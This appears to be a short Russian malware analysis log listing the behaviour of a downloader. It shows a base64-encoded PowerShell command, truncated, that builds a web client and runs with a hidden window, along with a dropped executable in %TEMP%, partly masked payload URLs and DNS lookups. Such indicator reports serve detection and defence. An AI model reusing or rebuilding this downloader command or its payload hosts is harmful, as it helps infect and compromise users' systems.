Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AH...
- %TEMP%\360.exe
- %TEMP%\360.exe
- http://po###astaff.ru/6iYWKl5I_MG
- http://we#######homecareservices.co.uk/A9Y90usX88aRT
- http://vk###.kultkam.ru/QUxQZUG_9i
- DNS ASK lo#####eelancersng.com
- DNS ASK po###astaff.ru
- DNS ASK we#######homecareservices.co.uk
- DNS ASK vk###.kultkam.ru
- DNS ASK be#######brainsmagazine.site
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABrAGkAbQA0AHEAegBpAHcAPQAoACcAUwB3AFQARQA2AEUAJwArACcAbAAnACkAOwAkAHoAawBtAEsAaQBXAD0AbgBlAHcALQBvAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAGEAOQBCADIAUwB0AD0AKAAnAGgAdAB0AH...' (со скрытым окном)